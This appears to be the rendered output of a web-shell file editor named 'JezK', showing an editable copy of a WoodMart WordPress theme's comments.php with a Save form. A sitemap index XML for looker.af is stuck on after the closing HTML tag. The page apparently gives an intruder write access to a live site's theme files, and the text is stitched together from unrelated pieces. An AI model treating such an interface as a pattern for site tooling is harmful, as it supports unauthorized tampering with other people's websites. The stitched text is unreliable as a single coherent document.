
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: comments.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php
/**
 * The template for displaying Comments
 *
 * The area of the page that contains comments and the comment form.
 *
 * @package WordPress
 * @subpackage WoodMart
 * @since WoodMart 1.2
 */

/*
 * If the current post is protected by a password and the visitor has not yet
 * entered the password we will return early without loading the comments.
 */
if ( post_password_required() ) {
	return;
}

woodmart_enqueue_inline_style( &#039;mod-comments&#039; );
?&gt;

&lt;div id=&quot;comments&quot; class=&quot;comments-area&quot;&gt;
	&lt;?php if ( have_comments() ) : ?&gt;
		&lt;h2 class=&quot;comments-title&quot;&gt;
			&lt;?php
				printf( wp_kses( _nx( &#039;One thought on &amp;ldquo;%2$s&amp;rdquo;&#039;, &#039;%1$s thoughts on &amp;ldquo;%2$s&amp;rdquo;&#039;, get_comments_number(), &#039;comments title&#039;, &#039;woodmart&#039; ), array() ),
					number_format_i18n( get_comments_number() ), &#039;&lt;span&gt;&#039; . get_the_title() . &#039;&lt;/span&gt;&#039; );
			?&gt;
		&lt;/h2&gt;

		&lt;ol class=&quot;comment-list&quot;&gt;
			&lt;?php
				wp_list_comments( array(
					&#039;style&#039;       =&gt; &#039;ol&#039;,
					&#039;short_ping&#039;  =&gt; true,
					&#039;avatar_size&#039; =&gt; 74,
				) );
			?&gt;
		&lt;/ol&gt;

		&lt;?php
			// Are there comments to navigate through?
			if ( get_comment_pages_count() &gt; 1 &amp;&amp; get_option( &#039;page_comments&#039; ) ) :
		?&gt;
		&lt;nav class=&quot;navigation comment-navigation&quot; role=&quot;navigation&quot; aria-label=&quot;&lt;?php esc_attr_e( &#039;Comment navigation&#039;, &#039;woodmart&#039; ); ?&gt;&quot;&gt;
			&lt;h1 class=&quot;screen-reader-text section-heading&quot;&gt;&lt;?php esc_html_e( &#039;Comment navigation&#039;, &#039;woodmart&#039; ); ?&gt;&lt;/h1&gt;
			&lt;div class=&quot;nav-previous&quot;&gt;&lt;?php previous_comments_link( esc_html__( &#039;&amp;larr; Older Comments&#039;, &#039;woodmart&#039; ) ); ?&gt;&lt;/div&gt;
			&lt;div class=&quot;nav-next&quot;&gt;&lt;?php next_comments_link( esc_html__( &#039;Newer Comments &amp;rarr;&#039;, &#039;woodmart&#039; ) ); ?&gt;&lt;/div&gt;
		&lt;/nav&gt;
		&lt;?php endif; // Check for comment navigation ?&gt;

		&lt;?php if ( ! comments_open() &amp;&amp; get_comments_number() ) : ?&gt;
			&lt;p class=&quot;no-comments&quot;&gt;&lt;?php esc_html_e( &#039;Comments are closed.&#039; , &#039;woodmart&#039; ); ?&gt;&lt;/p&gt;
		&lt;?php endif; ?&gt;

	&lt;?php endif; // have_comments() ?&gt;

	&lt;?php comment_form(array(
		&#039;comment_notes_after&#039; =&gt; &#039;&#039;
	)); ?&gt;

&lt;/div&gt;
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://looker.af/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://looker.af/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
